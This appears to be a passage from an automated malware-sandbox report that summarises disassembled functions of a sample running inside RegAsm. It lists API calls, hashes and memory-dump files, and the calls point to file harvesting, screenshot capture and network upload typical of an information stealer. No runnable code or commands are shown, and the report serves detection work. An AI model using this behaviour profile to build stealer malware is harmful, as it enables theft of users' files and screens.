                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                • Opcode ID: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                                                                                                                                                • Instruction ID: d151876d8cc95c0cfb6d8f68ae3702e2f0367945aae6205dd2140cd78635ff23
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                                                                                                                                                • Instruction Fuzzy Hash: AC218E71740B049BD724CFB4CD81BABB7F5EB40714F24492EE61BE6290D279AD408F18
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040C481 Relevance: 1.7, APIs: 1, Instructions: 223COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040C486
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FD0C: SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: _EH_prolog.MSVCRT ref: 0040FCCD
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: GetFileAttributesA.KERNEL32(00000000,?,0040CB40,?,?,?,?), ref: 0040FCE1
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 0040B20D: _EH_prolog.MSVCRT ref: 0040B212
                                                                                                                                                                                                  • Part of subcall function 0040B20D: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B265
                                                                                                                                                                                                  • Part of subcall function 0040B20D: memcmp.MSVCRT ref: 0040B2A3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2375657845-0
                                                                                                                                                                                                • Opcode ID: 31b05fd01038443aad3a5d05a62342d2caac59711eb6ac9689fe9ce4a91d07d9
                                                                                                                                                                                                • Instruction ID: 192756b65cd39bb7d0c5c25db1e27abe58892a75d45ed0417ce1d32a0d2d338e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 31b05fd01038443aad3a5d05a62342d2caac59711eb6ac9689fe9ce4a91d07d9
                                                                                                                                                                                                • Instruction Fuzzy Hash: B89172B1C04248EADF01EBE6C946ADEBBB8AF15304F10456FE445732C2DB795718CBA6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00405E55 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: b882ed06134a5c925a025e9c2e32e564ec4ca20038909c9c9d4a12e3f9dd45cb
                                                                                                                                                                                                • Instruction ID: e96af3136e19b36926b27c06f162c452fc52f03278400d1dbc9b68fd539e483a
                                                                                                                                                                                                • Opcode Fuzzy Hash: b882ed06134a5c925a025e9c2e32e564ec4ca20038909c9c9d4a12e3f9dd45cb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5841F571A0461AAFCF14AF94D8819AFBBB1EB48314F20447FE915BB391D6399D408F98
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                Function 00414462 Relevance: 44.1, APIs: 21, Strings: 4, Instructions: 316stringfileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00414467
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0041448D
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 004144A4
                                                                                                                                                                                                • memset.MSVCRT ref: 004144BB
                                                                                                                                                                                                • memset.MSVCRT ref: 004144C9
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00425798), ref: 004144E7
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,0042579C), ref: 00414501
                                                                                                                                                                                                • wsprintfA.USER32 ref: 00414525
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,004254AE), ref: 00414536
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0041455C
                                                                                                                                                                                                • wsprintfA.USER32 ref: 00414570
                                                                                                                                                                                                • memset.MSVCRT ref: 00414582
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00414594
                                                                                                                                                                                                • strtok_s.MSVCRT ref: 004145CD
                                                                                                                                                                                                • memset.MSVCRT ref: 004145E2
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 004145F7
                                                                                                                                                                                                • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0041461A
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041471C
                                                                                                                                                                                                • strtok_s.MSVCRT ref: 0041474D
                                                                                                                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00414870
                                                                                                                                                                                                • FindClose.KERNEL32(000000FF), ref: 00414881
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrcatlstrcpymemsetwsprintf$Find$Filestrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                                • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                • API String ID: 264515753-332874205
                                                                                                                                                                                                • Opcode ID: 45a2c926a36e324c1a659db2f6d9950ec8a480bf5c4a90691f540d55abf4b22e
                                                                                                                                                                                                • Instruction ID: 90f09cb4787a9c131c8907a5308eaa565c43d17f9929f8bed5a1c7cc166fda0b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 45a2c926a36e324c1a659db2f6d9950ec8a480bf5c4a90691f540d55abf4b22e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 77C181B1900258EADF10EBA1DC45EEE7BBDAF09304F10446AF515E3192DB389B58CB65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0041531B Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227stringfileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00415320
                                                                                                                                                                                                • wsprintfA.USER32 ref: 00415340
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00415357
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00425854), ref: 00415374
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00425858), ref: 0041538E
                                                                                                                                                                                                • wsprintfA.USER32 ref: 004153B2
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,004254BF), ref: 004153C3
                                                                                                                                                                                                • wsprintfA.USER32 ref: 004153E0
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004061D7: _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                  • Part of subcall function 004061D7: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                  • Part of subcall function 004061D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                  • Part of subcall function 004061D7: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                  • Part of subcall function 004061D7: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                • wsprintfA.USER32 ref: 004153F4
                                                                                                                                                                                                • PathMatchSpecA.SHLWAPI(?,?), ref: 00415407
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00415433
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00425870), ref: 00415445
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00415455
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00425874), ref: 00415467
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 0041547B
                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 00415616
                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00415625
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Filelstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
                                                                                                                                                                                                • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                • API String ID: 3254224521-445461498
                                                                                                                                                                                                • Opcode ID: 81ea7e93c22cc5b8ad77a87b270ab2e355fec8da294fbd899ae51f1247f1427f
                                                                                                                                                                                                • Instruction ID: 80175c9a934cebb72ef39c438ee54d638529756cf102169ddbb16661f2bc50a4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 81ea7e93c22cc5b8ad77a87b270ab2e355fec8da294fbd899ae51f1247f1427f
                                                                                                                                                                                                • Instruction Fuzzy Hash: A691A171D00218EBDF11EBA1DD4AEDE7BBDAF09304F0044AAF505A3192DB789758CBA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004102E8 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004102ED
                                                                                                                                                                                                • memset.MSVCRT ref: 00410313
                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00410349
                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00410356
                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 0041035D
                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00410367
                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00410378
                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00410383
                                                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041039F
                                                                                                                                                                                                • GlobalFix.KERNEL32(?), ref: 004103FD
                                                                                                                                                                                                • GlobalSize.KERNEL32(?), ref: 00410409
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004043CF: _EH_prolog.MSVCRT ref: 004043D4
                                                                                                                                                                                                  • Part of subcall function 004043CF: lstrlenA.KERNEL32(00000000), ref: 00404443
                                                                                                                                                                                                  • Part of subcall function 004043CF: StrCmpCA.SHLWAPI(?,004249DF,004249DB,004249D3,004249CF,004249CE), ref: 004044C6
                                                                                                                                                                                                  • Part of subcall function 004043CF: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044E6
                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00410483
                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0041049E
                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004104A5
                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 004104AF
                                                                                                                                                                                                • CloseWindow.USER32(00000000), ref: 004104B6
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                                                                                                                                                                                • String ID: image/jpeg
                                                                                                                                                                                                • API String ID: 3067874393-3785015651
                                                                                                                                                                                                • Opcode ID: 8a8bdd2b6da43701cbbdadb0da03d755d4225ed0530f69ec8f7c4ef74c1e1819
                                                                                                                                                                                                • Instruction ID: b72e8c075f97cd32244269dcb3d9bad35b59dd1cd10f8f5582361395917b64e1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a8bdd2b6da43701cbbdadb0da03d755d4225ed0530f69ec8f7c4ef74c1e1819
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E51F9B2C00218AFDF01EFE5DD499EEBFB9FF09314F10502AFA01A2161D7394A559BA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00414ED2 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 201stringmemoryfileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00414ED7
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00414EEF
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00414EF6
                                                                                                                                                                                                • wsprintfA.USER32 ref: 00414F0E
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00414F25
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00425838), ref: 00414F42
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,0042583C), ref: 00414F5C
                                                                                                                                                                                                • wsprintfA.USER32 ref: 00414F80
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00411CF6: _EH_prolog.MSVCRT ref: 00411CFB
                                                                                                                                                                                                  • Part of subcall function 00411CF6: memset.MSVCRT ref: 00411D1C
                                                                                                                                                                                                  • Part of subcall function 00411CF6: memset.MSVCRT ref: 00411D2A
                                                                                                                                                                                                  • Part of subcall function 00411CF6: lstrcat.KERNEL32(?,00000000), ref: 00411D56
                                                                                                                                                                                                  • Part of subcall function 00411CF6: lstrcat.KERNEL32(?), ref: 00411D74
                                                                                                                                                                                                  • Part of subcall function 00411CF6: lstrcat.KERNEL32(?,?), ref: 00411D88
                                                                                                                                                                                                  • Part of subcall function 00411CF6: lstrcat.KERNEL32(?), ref: 00411D9B
                                                                                                                                                                                                  • Part of subcall function 00411CF6: StrStrA.SHLWAPI(00000000), ref: 00411E35
                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 004150AF
                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004150BE
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 004150E3
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 004150F6
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 004150FF
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 0041510C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
